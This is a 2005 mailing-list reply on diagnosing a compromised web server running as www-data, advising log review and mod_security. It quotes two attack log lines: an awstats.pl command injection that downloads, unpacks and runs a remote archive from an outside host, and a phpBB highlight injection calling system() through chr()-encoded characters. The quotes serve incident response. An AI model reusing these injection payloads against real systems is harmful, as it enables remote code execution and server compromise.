[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: a compromised machine

On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote:

> Since the process runs as "www-data" some kiddy has abused a web service
> on your server to download and run an external software. Look for
> suspicious log lines of your web server.

  Yes ..

> Examples of hacks on our servers:
> 
> 82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET
> /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20
> HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1; SV1; FunWebProducts)"

> 211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET
> /phpbb/viewto
> pic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252ech
> r(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%
> 252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527
> HTTP/
> 1.0" 200 28732 "-" "PHP/4.3.4"
> 
> It should be rather easy finding signs of weird accesses like %20 or
> chr(). Also look for weird signs in /tmp.

  Both of these attacks could be prevented by the use of mod_security,
 which I'd recommend you look into using in the future if you have
 potentially untrusted scripts running.

Steve
--
Reply to: